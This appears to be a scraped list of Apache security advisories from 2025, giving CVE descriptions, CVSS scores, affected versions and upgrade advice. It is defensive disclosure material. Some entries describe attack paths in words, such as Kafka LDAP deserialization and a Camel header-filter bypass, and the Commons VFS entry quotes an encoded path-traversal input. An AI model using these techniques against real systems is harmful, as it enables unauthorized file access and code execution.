Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Felix Webconsole. This issue affects Apache Felix Webconsole 4.x up to 4.9.8 and 5.x up to 5.0.8. Users are recommended to upgrade to version 4.9.10 or 5.0.10 or higher, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache felix_webconsole *
CVE-2025-26413

Improper Input Validation vulnerability in Apache Kvrocks. The SETRANGE command didn't check if the `offset` input is a positive integer and use it as an index of a string. So it will cause the server to crash due to its index is  out of range. This issue affects Apache Kvrocks: through 2.11.1. Users are recommended to upgrade to version 2.12.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache kvrocks *
CVE-2025-26467

Privilege Defined With Unsafe Actions vulnerability in Apache Cassandra. An user with MODIFY permission ON ALL KEYSPACES can escalate privileges to superuser within a targeted Cassandra cluster via unsafe actions to a system resource. Operators granting data MODIFY permission on all keyspaces on affected versions should review data access rules for potential breaches. This issue affects Apache Cassandra 3.0.30, 3.11.17, 4.0.16, 4.1.7, 5.0.2, but this advisory is only for 4.0.16 because the fix to CVE-2025-23015 was incorrectly applied to 4.0.16, so that version is still affected. Users in the 4.0 series are recommended to upgrade to version 4.0.17 which fixes the issue. Users from 3.0, 3.11, 4.1 and 5.0 series should follow recommendation from CVE-2025-23015.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache cassandra *
CVE-2025-26521

When an Apache CloudStack user-account creates a CKS-based Kubernetes cluster in a project, the API key and the secret key of the 'kubeadmin' user of the caller account are used to create the secret config in the CKS-based Kubernetes cluster. A member of the project who can access the CKS-based Kubernetes cluster, can also access the API key and secret key of the 'kubeadmin' user of the CKS cluster's creator's account. An attacker who's a member of the project can exploit this to impersonate and perform privileged actions that can result in complete compromise of the confidentiality, integrity, and availability of resources owned by the creator's account. CKS users are recommended to upgrade to version 4.19.3.0 or 4.20.1.0, which fixes this issue.Updating Existing Kubernetes Clusters in ProjectsA service account should be created for each project to provide limited access specifically for Kubernetes cluster providers and autoscaling. Follow the steps below to create a new service account, update the secret inside the cluster, and regenerate existing API and service keys:1. Create a New Service AccountCreate a new account using the role "Project Kubernetes Service Role" with the following details: Account Name kubeadmin-<FIRST_EIGHT_CHARACTERS_OF_PROJECT_ID> First Name Kubernetes Last Name Service User Account Type 0 (Normal User) Role ID <ID_OF_SERVICE_ROLE> 2. Add the Service Account to the ProjectAdd this account to the project where the Kubernetes cluster(s) are hosted. 3. Generate API and Secret KeysGenerate API Key and Secret Key for the default user of this account. 4. Update the CloudStack Secret in the Kubernetes ClusterCreate a temporary file `/tmp/cloud-config` with the following data:    api-url = <API_URL>     # For example: <MS_URL>/client/api   api-key = <SERVICE_USER_API_KEY>   secret-key = <SERVICE_USER_SECRET_KEY>   project-id = <PROJECT_ID> Delete the existing secret using kubectl and Kubernetes cluster config:    ./kubectl --kubeconfig kube.conf -n kube-system delete secret cloudstack-secret Create a new secret using kubectl and Kubernetes cluster config:     ./kubectl --kubeconfig kube.conf -n kube-system create secret generic cloudstack-secret --from-file=/tmp/cloud-config Remove the temporary file:     rm /tmp/cloud-config5. Regenerate API and Secret KeysRegenerate the API and secret keys for the original user account that was used to create the Kubernetes cluster.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 2.8 5.2

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2025-26795

Exposure of Sensitive Information to an Unauthorized Actor, Insertion of Sensitive Information into Log File vulnerability in Apache IoTDB JDBC driver. This issue affects iotdb-jdbc: from 0.10.0 through 1.3.3, from 2.0.1-beta before 2.0.2. Users are recommended to upgrade to version 2.0.2 and 1.3.4, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache iotdb *
CVE-2025-26864

Exposure of Sensitive Information to an Unauthorized Actor, Insertion of Sensitive Information into Log File vulnerability in the OpenIdAuthorizer of Apache IoTDB. This issue affects Apache IoTDB: from 0.10.0 through 1.3.3, from 2.0.1-beta before 2.0.2. Users are recommended to upgrade to version 1.3.4 and 2.0.2, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache iotdb *
apache iotdb 2.0.1
CVE-2025-26865

Improper Neutralization of Special Elements Used in a Template Engine vulnerability in Apache OFBiz. This issue affects Apache OFBiz: from 18.12.17 before 18.12.18.   It's a regression between 18.12.17 and 18.12.18. In case you use something like that, which is not recommended! For security, only official releases should be used. In other words, if you use 18.12.17 you are still safe. The version 18.12.17 is not a affected. But something between 18.12.17 and 18.12.18 is. In that case, users are recommended to upgrade to version 18.12.18, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 3.5 LOW CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 0.9 2.5

Products Affected

Vendor Product Version
apache ofbiz 18.12.17
CVE-2025-26866

A remote code execution vulnerability exists where a malicious Raft node can exploit insecure Hessian deserialization within the PD store. The fix enforces IP-based authentication to restrict cluster membership and implements a strict class whitelist to harden the Hessian serialization process against object injection attacks. Users are recommended to upgrade to version 1.7.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache hugegraph *
CVE-2025-27017

Apache NiFi 1.13.0 through 2.2.0 includes the username and password used to authenticate with MongoDB in the NiFi provenance events that MongoDB components generate during processing. An authorized user with read access to the provenance events of those processors may see the credentials information. Upgrading to Apache NiFi 2.3.0 is the recommended mitigation, which removes the credentials from provenance event records.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache nifi *
CVE-2025-27018

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Airflow MySQL Provider. When user triggered a DAG with dump_sql or load_sql functions they could pass a table parameter from a UI, that could cause SQL injection by running SQL that was not intended. It could lead to data corruption, modification and others. This issue affects Apache Airflow MySQL Provider: before 6.2.0. Users are recommended to upgrade to version 6.2.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 2.8 3.4

Products Affected

Vendor Product Version
apache apache-airflow-providers-mysql *
CVE-2025-27391

Insertion of Sensitive Information into Log File vulnerability in Apache ActiveMQ Artemis. All the values of the broker properties are logged when the org.apache.activemq.artemis.core.config.impl.ConfigurationImpl logger has the debug level enabled. This issue affects Apache ActiveMQ Artemis: from 1.5.1 before 2.40.0. It can be mitigated by restricting log access to only trusted users. Users are recommended to upgrade to version 2.40.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache activemq_artemis *
CVE-2025-27427

A vulnerability exists in Apache ActiveMQ Artemis whereby a user with the createDurableQueue or createNonDurableQueue permission on an address can augment the routing-type supported by that address even if said user doesn't have the createAddress permission for that particular address. When combined with the send permission and automatic queue creation a user could successfully send a message with a routing-type not supported by the address when that message should actually be rejected on the basis that the user doesn't have permission to change the routing-type of the address. This issue affects Apache ActiveMQ Artemis from 2.0.0 through 2.39.0. Users are recommended to upgrade to version 2.40.0 which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache activemq_artemis *
CVE-2025-27446

Incorrect Permission Assignment for Critical Resource vulnerability in Apache APISIX(java-plugin-runner). Local listening file permissions in APISIX plugin runner allow a local attacker to elevate privileges. This issue affects Apache APISIX(java-plugin-runner): from 0.2.0 through 0.5.0. Users are recommended to upgrade to version 0.6.0 or higher, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 1.8 5.9

Products Affected

Vendor Product Version
apache apisix *
CVE-2025-27522

Deserialization of Untrusted Data vulnerability in Apache InLong. This issue affects Apache InLong: from 1.13.0 through 2.1.0. This vulnerability is a secondary mining bypass for CVE-2024-26579. Users are advised to upgrade to Apache InLong's 2.2.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/11732

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache inlong *
CVE-2025-27526

Deserialization of Untrusted Data vulnerability in Apache InLong. This issue affects Apache InLong: from 1.13.0 through 2.1.0. This vulnerability which can lead to JDBC Vulnerability URLEncdoe and backspace bypass. Users are advised to upgrade to Apache InLong's 2.2.0 or cherry-pick [1] to solve it. [1]  https://github.com/apache/inlong/pull/11747

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache inlong *
CVE-2025-27528

Deserialization of Untrusted Data vulnerability in Apache InLong. This issue affects Apache InLong: from 1.13.0 through 2.1.0. This vulnerability allows attackers to bypass the security mechanisms of InLong JDBC and leads to arbitrary file reading. Users are advised to upgrade to Apache InLong's 2.2.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/11747

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

Products Affected

Vendor Product Version
apache inlong *
CVE-2025-27531

Deserialization of Untrusted Data vulnerability in Apache InLong.  This issue affects Apache InLong: from 1.13.0 before 2.1.0, this issue would allow an authenticated attacker to read arbitrary files by double writing the param. Users are recommended to upgrade to version 2.1.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache inlong *
CVE-2025-27533

Memory Allocation with Excessive Size Value vulnerability in Apache ActiveMQ. During unmarshalling of OpenWire commands the size value of buffers was not properly validated which could lead to excessive memory allocation and be exploited to cause a denial of service (DoS) by depleting process memory, thereby affecting applications and services that rely on the availability of the ActiveMQ broker when not using mutual TLS connections. This issue affects Apache ActiveMQ: from 6.0.0 before 6.1.6, from 5.18.0 before 5.18.7, from 5.17.0 before 5.17.7, before 5.16.8. ActiveMQ 5.19.0 is not affected. Users are recommended to upgrade to version 6.1.6+, 5.19.0+, 5.18.7+, 5.17.7, or 5.16.8 or which fixes the issue. Existing users may implement mutual TLS to mitigate the risk on affected brokers.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache activemq *
CVE-2025-27553

Relative Path Traversal vulnerability in Apache Commons VFS before 2.10.0. The FileObject API in Commons VFS has a 'resolveFile' method that takes a 'scope' parameter. Specifying 'NameScope.DESCENDENT' promises that "an exception is thrown if the resolved file is not a descendent of the base file". However, when the path contains encoded ".." characters (for example, "%2E%2E/bar.txt"), it might return file objects that are not a descendent of the base file, without throwing an exception. This issue affects Apache Commons VFS: before 2.10.0. Users are recommended to upgrade to version 2.10.0, which fixes the issue.

Products Affected

Vendor Product Version
apache commons_vfs *
CVE-2025-27555

Airflow versions before 2.11.1 have a vulnerability that allows authenticated users with audit log access to see sensitive values in audit logs which they should not see. When sensitive connection parameters were set via airflow CLI, values of those variables appeared in the audit log and were stored unencrypted in the Airflow database. While this risk is limited to users with audit log access, it is recommended to upgrade to Airflow 2.11.1 or a later version, which addresses this issue. Users who previously used the CLI to set connections should manually delete entries with those connection sensitive values from the log table. This is similar but not the same issue as CVE-2024-50378

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2025-27636

Bypass/Injection vulnerability in Apache Camel components under particular conditions. This issue affects Apache Camel: from 4.10.0 through <= 4.10.1, from 4.8.0 through <= 4.8.4, from 3.10.0 through <= 3.22.3. Users are recommended to upgrade to version 4.10.2 for 4.10.x LTS, 4.8.5 for 4.8.x LTS and 3.22.4 for 3.x releases. This vulnerability is present in Camel's default incoming header filter, that allows an attacker to include Camel specific headers that for some Camel components can alter the behaviours such as the camel-bean component, to call another method on the bean, than was coded in the application. In the camel-jms component, then a malicious header can be used to send the message to another queue (on the same broker) than was coded in the application. This could also be seen by using the camel-exec component The attacker would need to inject custom headers, such as HTTP protocols. So if you have Camel applications that are directly connected to the internet via HTTP, then an attacker could include malicious HTTP headers in the HTTP requests that are send to the Camel application. All the known Camel HTTP component such as camel-servlet, camel-jetty, camel-undertow, camel-platform-http, and camel-netty-http would be vulnerable out of the box. In these conditions an attacker could be able to forge a Camel header name and make the bean component invoking other methods in the same bean. In terms of usage of the default header filter strategy the list of components using that is: * camel-activemq * camel-activemq6 * camel-amqp * camel-aws2-sqs * camel-azure-servicebus * camel-cxf-rest * camel-cxf-soap * camel-http * camel-jetty * camel-jms * camel-kafka * camel-knative * camel-mail * camel-nats * camel-netty-http * camel-platform-http * camel-rest * camel-sjms * camel-spring-rabbitmq * camel-stomp * camel-tahu * camel-undertow * camel-xmpp The vulnerability arises due to a bug in the default filtering mechanism that only blocks headers starting with "Camel", "camel", or "org.apache.camel.".  Mitigation: You can easily work around this in your Camel applications by removing the headers in your Camel routes. There are many ways of doing this, also globally or per route. This means you could use the removeHeaders EIP, to filter out anything like "cAmel, cAMEL" etc, or in general everything not starting with "Camel", "camel" or "org.apache.camel.".

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.6 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L 2.2 3.4

Products Affected

Vendor Product Version
apache camel *
CVE-2025-27696

Incorrect Authorization vulnerability in Apache Superset allows ownership takeover of dashboards, charts or datasets by authenticated users with read permissions. This issue affects Apache Superset: through 4.1.1. Users are recommended to upgrade to version 4.1.2 or above, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache superset *
CVE-2025-27817

A possible arbitrary file read and SSRF vulnerability has been identified in Apache Kafka Client. Apache Kafka Clients accept configuration data for setting the SASL/OAUTHBEARER connection with the brokers, including "sasl.oauthbearer.token.endpoint.url" and "sasl.oauthbearer.jwks.endpoint.url". Apache Kafka allows clients to read an arbitrary file and return the content in the error log, or sending requests to an unintended location. In applications where Apache Kafka Clients configurations can be specified by an untrusted party, attackers may use the "sasl.oauthbearer.token.endpoint.url" and "sasl.oauthbearer.jwks.endpoint.url" configuratin to read arbitrary contents of the disk and environment variables or make requests to an unintended location. In particular, this flaw may be used in Apache Kafka Connect to escalate from REST API access to filesystem/environment/URL access, which may be undesirable in certain environments, including SaaS products. Since Apache Kafka 3.9.1/4.0.0, we have added a system property ("-Dorg.apache.kafka.sasl.oauthbearer.allowed.urls") to set the allowed urls in SASL JAAS configuration. In 3.9.1, it accepts all urls by default for backward compatibility. However in 4.0.0 and newer, the default value is empty list and users have to set the allowed urls explicitly.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache kafka *
CVE-2025-27818

A possible security vulnerability has been identified in Apache Kafka. This requires access to a alterConfig to the cluster resource, or Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka clusters since Apache Kafka 2.0.0 (Kafka Connect 2.3.0). When configuring the broker via config file or AlterConfig command, or connector via the Kafka Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.LdapLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server. Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath. Since Apache Kafka 3.0.0, users are allowed to specify these properties in connector configurations for Kafka Connect clusters running with out-of-the-box configurations. Before Apache Kafka 3.0.0, users may not specify these properties unless the Kafka Connect cluster has been reconfigured with a connector client override policy that permits them. Since Apache Kafka 3.9.1/4.0.0, we have added a system property ("-Dorg.apache.kafka.disallowed.login.modules") to disable the problematic login modules usage in SASL JAAS configuration. Also by default "com.sun.security.auth.module.JndiLoginModule,com.sun.security.auth.module.LdapLoginModule" are disabled in Apache Kafka Connect 3.9.1/4.0.0. We advise the Kafka users to validate connector configurations and only allow trusted LDAP configurations. Also examine connector dependencies for vulnerable versions and either upgrade their connectors, upgrading that specific dependency, or removing the connectors as options for remediation. Finally, in addition to leveraging the "org.apache.kafka.disallowed.login.modules" system property, Kafka Connect users can also implement their own connector client config override policy, which can be used to control which Kafka client properties can be overridden directly in a connector config and which cannot.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache kafka *
CVE-2025-27819

In CVE-2023-25194, we announced the RCE/Denial of service attack via SASL JAAS JndiLoginModule configuration in Kafka Connect API. But not only Kafka Connect API is vulnerable to this attack, the Apache Kafka brokers also have this vulnerability. To exploit this vulnerability, the attacker needs to be able to connect to the Kafka cluster and have the AlterConfigs permission on the cluster resource. Since Apache Kafka 3.4.0, we have added a system property ("-Dorg.apache.kafka.disallowed.login.modules") to disable the problematic login modules usage in SASL JAAS configuration. Also by default "com.sun.security.auth.module.JndiLoginModule" is disabled in Apache Kafka 3.4.0, and "com.sun.security.auth.module.JndiLoginModule,com.sun.security.auth.module.LdapLoginModule" is disabled by default in in Apache Kafka 3.9.1/4.0.0

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache kafka *
CVE-2025-27820

A bug in PSL validation logic in Apache HttpClient 5.4.x disables domain checks, affecting cookie management and host name verification. Discovered by the Apache HttpClient team. Fixed in the 5.4.3 release

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache httpclient *
netapp ontap_tools 10
CVE-2025-27821

Out-of-bounds Write vulnerability in Apache Hadoop HDFS native client. This issue affects Apache Hadoop: from 3.2.0 before 3.4.2. Users are recommended to upgrade to version 3.4.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 3.9 3.4

Products Affected

Vendor Product Version
apache hadoop *
CVE-2025-27867

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Felix HTTP Webconsole Plugin. This issue affects Apache Felix HTTP Webconsole Plugin: from Version 1.X through 1.2.0. Users are recommended to upgrade to version 1.2.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.6 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L 2.2 3.4

Products Affected

Vendor Product Version
apache felix_http_webconsole_plugin *
CVE-2025-27888

Severity: medium (5.8) / important Server-Side Request Forgery (SSRF), Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Apache Druid. This issue affects all previous Druid versions. When using the Druid management proxy, a request that has a specially crafted URL could be used to redirect the request to an arbitrary server instead. This has the potential for XSS or XSRF. The user is required to be authenticated for this exploit. The management proxy is enabled in Druid's out-of-box configuration. It may be disabled to mitigate this vulnerability. If the management proxy is disabled, some web console features will not work properly, but core functionality is unaffected. Users are recommended to upgrade to Druid 31.0.2 or Druid 32.0.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

Products Affected

Vendor Product Version
apache druid *
CVE-2025-29847

A vulnerability in Apache Linkis. Problem Description When using the JDBC engine and da When using the JDBC engine and data source functionality, if the URL parameter configured on the frontend has undergone multiple rounds of URL encoding, it may bypass the system's checks. This bypass can trigger a vulnerability that allows unauthorized access to system files via JDBC parameters. Scope of Impact This issue affects Apache Linkis: from 1.3.0 through 1.7.0. Severity level moderate Solution Continuously check if the connection information contains the "%" character; if it does, perform URL decoding. Users are recommended to upgrade to version 1.8.0, which fixes the issue. More questions about this vulnerability can be discussed here:  https://lists.apache.org/list?dev@linkis.apache.org:2025-9:cve

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache linkis *
CVE-2025-29953

Deserialization of Untrusted Data vulnerability in Apache ActiveMQ NMS OpenWire Client. This issue affects Apache ActiveMQ NMS OpenWire Client before 2.1.1 when performing connections to untrusted servers. Such servers could abuse the unbounded deserialization in the client to provide malicious responses that may eventually cause arbitrary code execution on the client. Version 2.1.0 introduced a allow/denylist feature to restrict deserialization, but this feature could be bypassed. The .NET team has deprecated the built-in .NET binary serialization feature starting with .NET 9 and suggests migrating away from binary serialization. The project is considering to follow suit and drop this part of the NMS API altogether. Users are recommended to upgrade to version 2.1.1, which fixes the issue. We also recommend to migrate away from relying on .NET binary serialization as a hardening method for the future.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache activemq_nms_openwire *
CVE-2025-30001

Incorrect Execution-Assigned Permissions vulnerability in Apache StreamPark. This issue affects Apache StreamPark: from 2.1.4 before 2.1.6. Users are recommended to upgrade to version 2.1.6, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 3.9 3.4

Products Affected

Vendor Product Version
apache streampark *
CVE-2025-30065

Schema parsing in the parquet-avro module of Apache Parquet 1.15.0 and previous versions allows bad actors to execute arbitrary code Users are recommended to upgrade to version 1.15.1, which fixes the issue.

Products Affected

Vendor Product Version
apache parquet_java *
CVE-2025-30474

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Commons VFS. The FtpFileObject class can throw an exception when a file is not found, revealing the original URI in its message, which may include a password. The fix is to mask the password in the exception message This issue affects Apache Commons VFS: before 2.10.0. Users are recommended to upgrade to version 2.10.0, which fixes the issue.

Products Affected

Vendor Product Version
apache commons_vfs *
CVE-2025-30675

In Apache CloudStack, a flaw in access control affects the listTemplates and listIsos APIs. A malicious Domain Admin or Resource Admin can exploit this issue by intentionally specifying the 'domainid' parameter along with the 'filter=self' or 'filter=selfexecutable' values. This allows the attacker to gain unauthorized visibility into templates and ISOs under the ROOT domain. A malicious admin can enumerate and extract metadata of templates and ISOs that belong to unrelated domains, violating isolation boundaries and potentially exposing sensitive or internal configuration details.  This vulnerability has been fixed by ensuring the domain resolution strictly adheres to the caller's scope rather than defaulting to the ROOT domain. Affected users are recommended to upgrade to Apache CloudStack 4.19.3.0 or 4.20.1.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.7 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L 1.2 3.4

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2025-30676

Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.19. Users are recommended to upgrade to version 18.12.19, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2025-30677

Apache Pulsar contains multiple connectors for integrating with Apache Kafka. The Pulsar IO Apache Kafka Source Connector, Sink Connector, and Kafka Connect Adaptor Sink Connector log sensitive configuration properties in plain text in application logs. This vulnerability can lead to unintended exposure of credentials in log files, potentially allowing attackers with access to these logs to obtain Apache Kafka credentials. The vulnerability's impact is limited by the fact that an attacker would need access to the application logs to exploit this issue. This issue affects Apache Pulsar IO's Apache Kafka connectors in all versions before 3.0.11, 3.3.6, and 4.0.4. 3.0.x version users should upgrade to at least 3.0.11. 3.3.x version users should upgrade to at least 3.3.6. 4.0.x version users should upgrade to at least 4.0.4. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache pulsar *
CVE-2025-31650

Improper Input Validation vulnerability in Apache Tomcat. Incorrect error handling for some invalid HTTP priority headers resulted in incomplete clean-up of the failed request which created a memory leak. A large number of such requests could trigger an OutOfMemoryException resulting in a denial of service. This issue affects Apache Tomcat: from 9.0.76 through 9.0.102, from 10.1.10 through 10.1.39, from 11.0.0-M2 through 11.0.5. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.90 though 8.5.100. Users are recommended to upgrade to version 9.0.104, 10.1.40 or 11.0.6 which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 11.0.0
CVE-2025-31651

